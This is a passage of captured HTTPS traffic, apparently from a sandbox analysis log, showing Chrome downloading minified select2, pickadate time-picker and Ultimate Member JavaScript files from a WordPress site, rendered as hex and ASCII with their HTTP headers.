                                                                                                                                                                                                                                                                        Data Ascii: .listeners[e],t.call(arguments,1)),"*"in this.listeners&&this.invoke(this.listeners["*"],arguments)},e.prototype.invoke=function(e,t){for(var n=0,i=e.length;n<i;n++)e[n].apply(this,t)},r.Observable=e,r.generateChars=function(e){for(var t="",n=0;n<e;n++){t
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 2e 74 6f 53 74 72 69 6e 67 28 29 29 29 2c 74 7d 2c 72 2e 53 74 6f 72 65 44 61 74 61 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 3d 72 2e 47 65 74 55 6e 69 71 75 65 45 6c 65 6d 65 6e 74 49 64 28 65 29 3b 72 2e 5f 5f 63 61 63 68 65 5b 69 5d 7c 7c 28 72 2e 5f 5f 63 61 63 68 65 5b 69 5d 3d 7b 7d 29 2c 72 2e 5f 5f 63 61 63 68 65 5b 69 5d 5b 74 5d 3d 6e 7d 2c 72 2e 47 65 74 44 61 74 61 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 72 2e 47 65 74 55 6e 69 71 75 65 45 6c 65 6d 65 6e 74 49 64 28 65 29 3b 72 65 74 75 72 6e 20 74 3f 72 2e 5f 5f 63 61 63 68 65 5b 6e 5d 26 26 6e 75 6c 6c 21 3d 72 2e 5f 5f 63 61 63 68 65 5b 6e 5d 5b 74 5d 3f 72 2e 5f 5f 63 61 63 68 65 5b 6e 5d 5b 74 5d 3a 6f 28 65 29 2e 64 61 74 61 28 74 29 3a 72
                                                                                                                                                                                                                                                                        Data Ascii: .toString())),t},r.StoreData=function(e,t,n){var i=r.GetUniqueElementId(e);r.__cache[i]||(r.__cache[i]={}),r.__cache[i][t]=n},r.GetData=function(e,t){var n=r.GetUniqueElementId(e);return t?r.__cache[n]&&null!=r.__cache[n][t]?r.__cache[n][t]:o(e).data(t):r
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 74 68 29 7b 65 2e 72 65 73 75 6c 74 73 3d 74 68 69 73 2e 73 6f 72 74 28 65 2e 72 65 73 75 6c 74 73 29 3b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 72 65 73 75 6c 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 2e 72 65 73 75 6c 74 73 5b 6e 5d 2c 72 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 28 69 29 3b 74 2e 70 75 73 68 28 72 29 7d 74 68 69 73 2e 24 72 65 73 75 6c 74 73 2e 61 70 70 65 6e 64 28 74 29 7d 65 6c 73 65 20 30 3d 3d 3d 74 68 69 73 2e 24 72 65 73 75 6c 74 73 2e 63 68 69 6c 64 72 65 6e 28 29 2e 6c 65 6e 67 74 68 26 26 74 68 69 73 2e 74 72 69 67 67 65 72 28 22 72 65 73 75 6c 74 73 3a 6d 65 73 73 61 67 65 22 2c 7b 6d 65 73 73 61 67 65 3a 22 6e 6f 52 65 73 75 6c 74 73 22 7d 29 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 70 6f 73 69 74
                                                                                                                                                                                                                                                                        Data Ascii: th){e.results=this.sort(e.results);for(var n=0;n<e.results.length;n++){var i=e.results[n],r=this.option(i);t.push(r)}this.$results.append(t)}else 0===this.$results.children().length&&this.trigger("results:message",{message:"noResults"})},i.prototype.posit
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6c 69 22 29 3b 74 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 73 65 6c 65 63 74 32 2d 72 65 73 75 6c 74 73 5f 5f 6f 70 74 69 6f 6e 22 3b 76 61 72 20 6e 3d 7b 72 6f 6c 65 3a 22 6f 70 74 69 6f 6e 22 2c 22 61 72 69 61 2d 73 65 6c 65 63 74 65 64 22 3a 22 66 61 6c 73 65 22 7d 2c 69 3d 77 69 6e 64 6f 77 2e 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 74 63 68 65 73 7c 7c 77 69 6e 64 6f 77 2e 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 73 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 77 69 6e 64 6f 77 2e 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 77 65 62 6b 69 74 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 28 6e 75 6c 6c 21 3d 65 2e 65 6c 65 6d
                                                                                                                                                                                                                                                                        Data Ascii: reateElement("li");t.className="select2-results__option";var n={role:"option","aria-selected":"false"},i=window.Element.prototype.matches||window.Element.prototype.msMatchesSelector||window.Element.prototype.webkitMatchesSelector;for(var r in(null!=e.elem
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 61 73 73 65 73 28 29 2c 6c 2e 6f 70 74 69 6f 6e 73 2e 67 65 74 28 22 73 63 72 6f 6c 6c 41 66 74 65 72 53 65 6c 65 63 74 22 29 26 26 6c 2e 68 69 67 68 6c 69 67 68 74 46 69 72 73 74 49 74 65 6d 28 29 29 7d 29 2c 74 2e 6f 6e 28 22 75 6e 73 65 6c 65 63 74 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 69 73 4f 70 65 6e 28 29 26 26 28 6c 2e 73 65 74 43 6c 61 73 73 65 73 28 29 2c 6c 2e 6f 70 74 69 6f 6e 73 2e 67 65 74 28 22 73 63 72 6f 6c 6c 41 66 74 65 72 53 65 6c 65 63 74 22 29 26 26 6c 2e 68 69 67 68 6c 69 67 68 74 46 69 72 73 74 49 74 65 6d 28 29 29 7d 29 2c 74 2e 6f 6e 28 22 6f 70 65 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 2e 24 72 65 73 75 6c 74 73 2e 61 74 74 72 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 22 74 72 75 65 22 29 2c 6c 2e 24 72 65
                                                                                                                                                                                                                                                                        Data Ascii: asses(),l.options.get("scrollAfterSelect")&&l.highlightFirstItem())}),t.on("unselect",function(){t.isOpen()&&(l.setClasses(),l.options.get("scrollAfterSelect")&&l.highlightFirstItem())}),t.on("open",function(){l.$results.attr("aria-expanded","true"),l.$re
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 69 2e 6f 75 74 65 72 48 65 69 67 68 74 28 21 31 29 2c 73 3d 6c 2e 24 72 65 73 75 6c 74 73 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2b 6f 2d 72 3b 30 3d 3d 3d 6e 3f 6c 2e 24 72 65 73 75 6c 74 73 2e 73 63 72 6f 6c 6c 54 6f 70 28 30 29 3a 72 3c 6f 26 26 6c 2e 24 72 65 73 75 6c 74 73 2e 73 63 72 6f 6c 6c 54 6f 70 28 73 29 7d 7d 29 2c 74 2e 6f 6e 28 22 72 65 73 75 6c 74 73 3a 66 6f 63 75 73 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 6c 65 6d 65 6e 74 2e 61 64 64 43 6c 61 73 73 28 22 73 65 6c 65 63 74 32 2d 72 65 73 75 6c 74 73 5f 5f 6f 70 74 69 6f 6e 2d 2d 68 69 67 68 6c 69 67 68 74 65 64 22 29 7d 29 2c 74 2e 6f 6e 28 22 72 65 73 75 6c 74 73 3a 6d 65 73 73 61 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 2e 64 69 73 70 6c 61 79 4d 65 73 73 61 67 65 28
                                                                                                                                                                                                                                                                        Data Ascii: i.outerHeight(!1),s=l.$results.scrollTop()+o-r;0===n?l.$results.scrollTop(0):r<o&&l.$results.scrollTop(s)}}),t.on("results:focus",function(e){e.element.addClass("select2-results__option--highlighted")}),t.on("results:message",function(e){l.displayMessage(


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        71192.168.2.449829141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC594OUTGET /wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.time.min.js?ver=3.6.2 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:54 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-22bf"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147811
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9f6191c41c0-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC877INData Raw: 32 32 62 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 2e 2f 70 69 63 6b 65 72 22 2c 22 6a 71 75 65 72 79 22 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 72 65 71 75 69 72 65 28 22 2e 2f 70 69 63 6b 65 72 2e 6a 73 22 29 2c 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 3a 74 28 50 69 63 6b 65 72 2c 6a 51 75 65 72 79 29 7d 28 66 75 6e 63 74 69 6f 6e 28 74 2c 6c 29 7b 76 61 72 20 65 2c 6d 3d 36 30 2c 6e 3d 31 34 34 30 2c 68 3d 74 2e 5f 3b 66 75 6e 63 74 69 6f 6e 20 69 28 6e 2c 61 29 7b 76 61 72 20 74 2c 65 3d 74 68
                                                                                                                                                                                                                                                                        Data Ascii: 22bf!function(t){"function"==typeof define&&define.amd?define(["./picker","jquery"],t):"object"==typeof exports?module.exports=t(require("./picker.js"),require("jquery")):t(Picker,jQuery)}(function(t,l){var e,m=60,n=1440,h=t._;function i(n,a){var t,e=th
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 3a 2d 31 2c 33 39 3a 31 2c 33 37 3a 2d 31 2c 67 6f 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 2e 73 65 74 28 22 68 69 67 68 6c 69 67 68 74 22 2c 65 2e 69 74 65 6d 2e 68 69 67 68 6c 69 67 68 74 2e 70 69 63 6b 2b 74 2a 65 2e 69 74 65 6d 2e 69 6e 74 65 72 76 61 6c 2c 7b 69 6e 74 65 72 76 61 6c 3a 74 2a 65 2e 69 74 65 6d 2e 69 6e 74 65 72 76 61 6c 7d 29 2c 74 68 69 73 2e 72 65 6e 64 65 72 28 29 7d 7d 2c 6e 2e 6f 6e 28 22 72 65 6e 64 65 72 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 2c 69 29 7b 72 28 22 74 72 61 6e 73 66 6f 72 6d 22 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 2e 63 73 73 28 74 2c 69 29 7d 29 2c 72 28 22 74 72 61 6e 73 69 74 69 6f 6e 22 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 2e 63 73
                                                                                                                                                                                                                                                                        Data Ascii: :-1,39:1,37:-1,go:function(t){e.set("highlight",e.item.highlight.pick+t*e.item.interval,{interval:t*e.item.interval}),this.render()}},n.on("render",function(){function t(e,i){r("transform").map(function(t){e.css(t,i)}),r("transition").map(function(t){e.cs
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 69 73 49 6e 74 65 67 65 72 28 65 2e 70 69 63 6b 29 3f 65 3d 65 2e 70 69 63 6b 3a 6c 2e 69 73 41 72 72 61 79 28 65 29 3f 65 3d 2b 65 5b 30 5d 2a 6d 2b 20 2b 65 5b 31 5d 3a 68 2e 69 73 49 6e 74 65 67 65 72 28 65 29 7c 7c 28 65 3d 72 2e 6e 6f 77 28 74 2c 65 2c 69 29 29 2c 22 6d 61 78 22 3d 3d 74 26 26 65 3c 72 2e 69 74 65 6d 2e 6d 69 6e 2e 70 69 63 6b 26 26 28 65 2b 3d 6e 29 2c 22 6d 69 6e 22 21 3d 74 26 26 22 6d 61 78 22 21 3d 74 26 26 28 65 2d 72 2e 69 74 65 6d 2e 6d 69 6e 2e 70 69 63 6b 29 25 72 2e 69 74 65 6d 2e 69 6e 74 65 72 76 61 6c 21 3d 30 26 26 28 65 2b 3d 72 2e 69 74 65 6d 2e 69 6e 74 65 72 76 61 6c 29 2c 7b 68 6f 75 72 3a 7e 7e 28 32 34 2b 28 65 3d 72 2e 6e 6f 72 6d 61 6c 69 7a 65 28 74 2c 65 2c 69 29 29 2f 6d 29 25 32 34 2c 6d 69 6e 73 3a 28 6d
                                                                                                                                                                                                                                                                        Data Ascii: isInteger(e.pick)?e=e.pick:l.isArray(e)?e=+e[0]*m+ +e[1]:h.isInteger(e)||(e=r.now(t,e,i)),"max"==t&&e<r.item.min.pick&&(e+=n),"min"!=t&&"max"!=t&&(e-r.item.min.pick)%r.item.interval!=0&&(e+=r.item.interval),{hour:~~(24+(e=r.normalize(t,e,i))/m)%24,mins:(m
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 3a 5b 32 33 2c 35 39 5d 29 29 3f 65 3d 74 68 69 73 2e 70 61 72 73 65 28 74 2c 65 29 3a 21 30 3d 3d 3d 65 7c 7c 68 2e 69 73 49 6e 74 65 67 65 72 28 65 29 3f 65 3d 74 68 69 73 2e 6e 6f 77 28 74 2c 65 2c 69 29 3a 6c 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 65 29 26 26 68 2e 69 73 49 6e 74 65 67 65 72 28 65 2e 70 69 63 6b 29 26 26 28 65 3d 74 68 69 73 2e 6e 6f 72 6d 61 6c 69 7a 65 28 74 2c 65 2e 70 69 63 6b 2c 69 29 29 2c 65 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 69 64 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 69 3d 28 69 26 26 69 2e 69 6e 74 65 72 76 61 6c 3f 69 3a 72 2e 69 74 65 6d 29 2e 69 6e 74 65 72 76 61 6c 3b 72 65 74 75 72 6e 20 72 2e 64 69 73 61 62 6c 65 64 28 65 29 26 26 28 65 3d 72
                                                                                                                                                                                                                                                                        Data Ascii: :[23,59]))?e=this.parse(t,e):!0===e||h.isInteger(e)?e=this.now(t,e,i):l.isPlainObject(e)&&h.isInteger(e.pick)&&(e=this.normalize(t,e.pick,i)),e},i.prototype.validate=function(t,e,i){var r=this,i=(i&&i.interval?i:r.item).interval;return r.disabled(e)&&(e=r
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 6f 29 3f 73 2e 6d 61 74 63 68 28 2f 5e 28 68 7c 68 68 29 24 2f 69 29 3f 28 69 3d 6f 2c 22 68 22 21 3d 73 26 26 22 68 68 22 21 3d 73 7c 7c 28 69 25 3d 31 32 29 29 3a 22 69 22 3d 3d 73 26 26 28 6e 3d 6f 29 3a 73 2e 6d 61 74 63 68 28 2f 5e 61 24 2f 69 29 26 26 6f 2e 6d 61 74 63 68 28 2f 5e 70 2f 69 29 26 26 28 22 68 22 69 6e 20 63 7c 7c 22 68 68 22 69 6e 20 63 29 26 26 28 61 3d 21 30 29 3b 72 65 74 75 72 6e 28 61 3f 69 2b 31 32 3a 69 29 2a 6d 2b 6e 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 6d 61 74 73 3d 7b 68 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 74 3f 68 2e 64 69 67 69 74 73 28 74 29 3a 65 2e 68 6f 75 72 25 31 32 7c 7c 31 32 7d 2c 68 68 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 74 3f 32 3a 68 2e
                                                                                                                                                                                                                                                                        Data Ascii: o)?s.match(/^(h|hh)$/i)?(i=o,"h"!=s&&"hh"!=s||(i%=12)):"i"==s&&(n=o):s.match(/^a$/i)&&o.match(/^p/i)&&("h"in c||"hh"in c)&&(a=!0);return(a?i+12:i)*m+n},i.prototype.formats={h:function(t,e){return t?h.digits(t):e.hour%12||12},hh:function(t,e){return t?2:h.
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 20 65 3d 74 68 69 73 2e 69 74 65 6d 3b 65 2e 65 6e 61 62 6c 65 3d 74 7c 7c 28 2d 31 3d 3d 65 2e 65 6e 61 62 6c 65 3f 31 3a 2d 31 29 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 61 63 74 69 76 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 72 2e 69 74 65 6d 2e 64 69 73 61 62 6c 65 2e 73 6c 69 63 65 28 30 29 3b 72 65 74 75 72 6e 22 66 6c 69 70 22 3d 3d 65 3f 72 2e 66 6c 69 70 45 6e 61 62 6c 65 28 29 3a 21 31 3d 3d 3d 65 3f 28 72 2e 66 6c 69 70 45 6e 61 62 6c 65 28 31 29 2c 6e 3d 5b 5d 29 3a 21 30 3d 3d 3d 65 3f 28 72 2e 66 6c 69 70 45 6e 61 62 6c 65 28 2d 31 29 2c 6e 3d 5b 5d 29 3a 65 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 2c 69 3d 30 3b 69 3c 6e 2e 6c 65 6e 67 74 68 3b
                                                                                                                                                                                                                                                                        Data Ascii: e=this.item;e.enable=t||(-1==e.enable?1:-1)},i.prototype.deactivate=function(t,e){var r=this,n=r.item.disable.slice(0);return"flip"==e?r.flipEnable():!1===e?(r.flipEnable(1),n=[]):!0===e?(r.flipEnable(-1),n=[]):e.map(function(t){for(var e,i=0;i<n.length;
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1181INData Raw: 26 26 63 2e 70 69 63 6b 3d 3d 69 2c 6e 3d 6d 26 26 6d 2e 70 69 63 6b 3d 3d 69 2c 61 3d 70 26 26 6f 2e 64 69 73 61 62 6c 65 64 28 74 29 2c 73 3d 68 2e 74 72 69 67 67 65 72 28 6f 2e 66 6f 72 6d 61 74 73 2e 74 6f 53 74 72 69 6e 67 2c 6f 2c 5b 6c 2e 66 6f 72 6d 61 74 2c 74 5d 29 3b 72 65 74 75 72 6e 5b 68 2e 74 72 69 67 67 65 72 28 6f 2e 66 6f 72 6d 61 74 73 2e 74 6f 53 74 72 69 6e 67 2c 6f 2c 5b 68 2e 74 72 69 67 67 65 72 28 6c 2e 66 6f 72 6d 61 74 4c 61 62 65 6c 2c 6f 2c 5b 74 5d 29 7c 7c 6c 2e 66 6f 72 6d 61 74 2c 74 5d 29 2c 28 65 3d 5b 6c 2e 6b 6c 61 73 73 2e 6c 69 73 74 49 74 65 6d 5d 2c 72 26 26 65 2e 70 75 73 68 28 6c 2e 6b 6c 61 73 73 2e 73 65 6c 65 63 74 65 64 29 2c 6e 26 26 65 2e 70 75 73 68 28 6c 2e 6b 6c 61 73 73 2e 68 69 67 68 6c 69 67 68 74 65
                                                                                                                                                                                                                                                                        Data Ascii: &&c.pick==i,n=m&&m.pick==i,a=p&&o.disabled(t),s=h.trigger(o.formats.toString,o,[l.format,t]);return[h.trigger(o.formats.toString,o,[h.trigger(l.formatLabel,o,[t])||l.format,t]),(e=[l.klass.listItem],r&&e.push(l.klass.selected),n&&e.push(l.klass.highlighte
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        72192.168.2.449831141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC577OUTGET /wp-content/plugins/ultimate-member/assets/js/common.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:54 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-9ed"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147811
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9f619860f6c-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC878INData Raw: 39 65 64 0d 0a 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 55 4d 26 26 28 77 69 6e 64 6f 77 2e 55 4d 3d 7b 7d 29 2c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 55 4d 2e 63 6f 6d 6d 6f 6e 26 26 28 55 4d 2e 63 6f 6d 6d 6f 6e 3d 7b 7d 29 2c 55 4d 2e 63 6f 6d 6d 6f 6e 3d 7b 74 69 70 73 79 3a 7b 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 66 6e 2e 74 69 70 73 79 26 26 28 6a 51 75 65 72 79 28 22 2e 75 6d 2d 74 69 70 2d 6e 22 29 2e 74 69 70 73 79 28 7b 67 72 61 76 69 74 79 3a 22 6e 22 2c 6f 70 61 63 69 74 79 3a 31 2c 6c 69 76 65 3a 22 61 2e 6c 69 76 65 22 2c 6f 66 66 73 65 74 3a 33 7d 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 2d 74 69 70 2d 77 22 29
                                                                                                                                                                                                                                                                        Data Ascii: 9ed"object"!=typeof window.UM&&(window.UM={}),"object"!=typeof UM.common&&(UM.common={}),UM.common={tipsy:{init:function(){"function"==typeof jQuery.fn.tipsy&&(jQuery(".um-tip-n").tipsy({gravity:"n",opacity:1,live:"a.live",offset:3}),jQuery(".um-tip-w")
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 6c 65 6d 2e 61 74 74 72 28 22 64 61 74 61 2d 64 69 73 61 62 6c 65 64 5f 77 65 65 6b 64 61 79 73 22 29 26 26 4a 53 4f 4e 2e 70 61 72 73 65 28 65 6c 65 6d 2e 61 74 74 72 28 22 64 61 74 61 2d 64 69 73 61 62 6c 65 64 5f 77 65 65 6b 64 61 79 73 22 29 29 3b 76 61 72 20 65 2c 74 3d 6e 75 6c 6c 2c 69 3d 28 76 6f 69 64 20 30 21 3d 3d 65 6c 65 6d 2e 61 74 74 72 28 22 64 61 74 61 2d 79 65 61 72 73 22 29 26 26 28 74 3d 65 6c 65 6d 2e 61 74 74 72 28 22 64 61 74 61 2d 79 65 61 72 73 22 29 29 2c 65 6c 65 6d 2e 61 74 74 72 28 22 64 61 74 61 2d 64 61 74 65 5f 6d 69 6e 22 29 29 2c 61 3d 65 6c 65 6d 2e 61 74 74 72 28 22 64 61 74 61 2d 64 61 74 65 5f 6d 61 78 22 29 2c 6e 3d 5b 5d 2c 6f 3d 5b 5d 2c 69 3d 28 76 6f 69 64 20 30 21 3d 3d 69 26 26 28 6e 3d 69 2e 73 70 6c 69 74 28
                                                                                                                                                                                                                                                                        Data Ascii: lem.attr("data-disabled_weekdays")&&JSON.parse(elem.attr("data-disabled_weekdays"));var e,t=null,i=(void 0!==elem.attr("data-years")&&(t=elem.attr("data-years")),elem.attr("data-date_min")),a=elem.attr("data-date_max"),n=[],o=[],i=(void 0!==i&&(n=i.split(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC301INData Raw: 3f 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 5b 74 5d 29 7c 7c 28 61 5b 74 5d 3d 5b 61 5b 74 5d 5d 29 2c 61 5b 74 5d 2e 70 75 73 68 28 69 29 29 3a 61 5b 74 5d 3d 69 3b 72 65 74 75 72 6e 20 61 7d 7d 7d 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 61 6a 61 78 53 74 61 72 74 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 55 4d 2e 63 6f 6d 6d 6f 6e 2e 74 69 70 73 79 2e 68 69 64 65 28 29 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 61 6a 61 78 53 75 63 63 65 73 73 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 55 4d 2e 63 6f 6d 6d 6f 6e 2e 74 69 70 73 79 2e 69 6e 69 74 28 29 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 55 4d 2e 63 6f 6d 6d 6f 6e 2e 74 69 70
                                                                                                                                                                                                                                                                        Data Ascii: ?(Array.isArray(a[t])||(a[t]=[a[t]]),a[t].push(i)):a[t]=i;return a}}},jQuery(document).on("ajaxStart",function(){UM.common.tipsy.hide()}),jQuery(document).on("ajaxSuccess",function(){UM.common.tipsy.init()}),jQuery(document).ready(function(){UM.common.tip
